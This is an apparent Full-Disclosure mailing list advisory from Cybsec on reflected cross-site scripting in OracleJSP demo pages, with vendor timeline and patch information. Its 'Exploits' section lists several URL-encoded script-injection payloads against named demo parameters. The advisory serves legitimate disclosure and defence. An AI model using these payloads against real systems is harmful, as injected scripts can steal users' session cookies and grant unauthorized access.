[Full-disclosure] Cybsec Advisory 2011 0403 OracleJSP Demos Reflected XSS

["CYBSEC Labs" <cybseclabs@xxxxxxxxxx>]

Advisory Name: Reflected Cross-Site Scripting (XSS) in OracleJSP Demos 

 

Internal Cybsec Advisory Id: 2011-0403- Reflected Cross-Site Scripting (XSS) in 
OracleJSP Demos

 

Vulnerability Class: Reflected Cross-Site Scripting (XSS)

 

Release Date:  April 20, 2011

 

Affected Applications: Confirmed in OracleJSP 1.1.2.4.0 with iAS v1.0.2.2. 
Other versions may also be affected

 

Affected Platforms: Any running OracleJSP Demos 

 

Local / Remote: Remote 

 

Severity: Medium - CVSS: 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N)

 

Researcher: Nahuel Grisolia

 

Vendor Status: Patched

 

Reference to Vulnerability Disclosure Policy: 
http://www.cybsec.com/vulnerability_policy.pdf

 

Vulnerability Description:

 

A reflected Cross Site Scripting vulnerability was found in OracleJSP 1.1.2.4.0 
Demos with iAS v1.0.2.2, because scripts fail to sanitize user-supplied input. 
The vulnerability can be triggered by any user who is able access those Demos.

 

Exploits: 

 

http://171.XXX.XX.64/demo/sql/index.jsp?connStr=%22%3E%3Cscript%3Ealert%28%22XSs%22%29;%3C/script%3E

 

 

http://171.XXX.XX.64/demo/basic/hellouser/hellouser.jsp?newName=%3Cscript%3Ealert%28%22XSs%22%29;%3C%2Fscript%3E

 

 

http://171.XXX.XX.64/demo/basic/hellouser/hellouser_jml.jsp?newName=%3Cscript%3Ealert%28%22XSs%22%29%3B%3C%2Fscript%3E

 

 

http://171.XXX.XX.64/demo/basic/simple/welcomeuser.jsp?user=%3Cscript%3Ealert%28%22XSs%22%29%3B%3C%2Fscript%3E

 

 

 

 

 

http://171.XXX.XX.64/demo/basic/simple/usebean.jsp?newName=%3Cscript%3Ealert%28%22XSs%22%29%3B%3C%2Fscript%3E

 

http://171.XXX.XX.64/demo/ojspext/jmltype/index.jsp, in field "String Test"

 

Impact:

 

An affected user may unintentionally execute scripts or actions written by an 
attacker. In addition, an attacker may obtain authorization cookies that would 
allow him to gain unauthorized access to the application.

 

Solution: Install Oracle Critical Patch Update (CPU) - April 2011.

 

Vendor Response: 

Feb 4, 2010 - Vendor contacted.

Feb 5, 2010 - Vendor asks for mor detailed information, which is provided by 
Cybsec.

Feb 8, 2010 - Vendor acknowledges vulnerability and assigns internal tracking 
ID  "12907193".

Apr 15, 2011 - Vendor informs vulnerability will be fixed in upcoming Critical 
Patch Update.

Apr 18, 2011 - Vendor informs that the vulnerability is fixed in the upcoming 
Critical Patch Update (CPU) due to be released on April 19, 2011.

Apr 19, 2011 - Vendor publishes CPU.

Apr 20. 2011 - Cybsec Publishes Vulnerability.

     

Contact Information:

 

For more information regarding the vulnerability feel free to contact Cybsec 
Labs at 

cybseclabs <at> cybsec <dot> com

 

About CYBSEC S.A. Security Systems 

 

Since 1996 CYBSEC S.A. is devoted exclusively to provide professional services 
specialized in Computer Security. More than 150 clients around the globe 
validate our quality and professionalism. 

 

To keep objectivity, CYBSEC S.A. does not represent, neither sell, nor is 
associated with other software and/or hardware provider companies. 

 

Our services are strictly focused on Information Security, protecting our 
clients from emerging security threats, maintaining their IT deployments 
available, safe, and reliable. 

 

Beyond professional services, CYBSEC is continuously researching new defense 
and attack techniques and contributing with the security community with high 
quality information exchange. 

 

For more information, please visit www.cybsec.com 

 

(c) 2011 - CYBSEC S.A. Security Systems

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/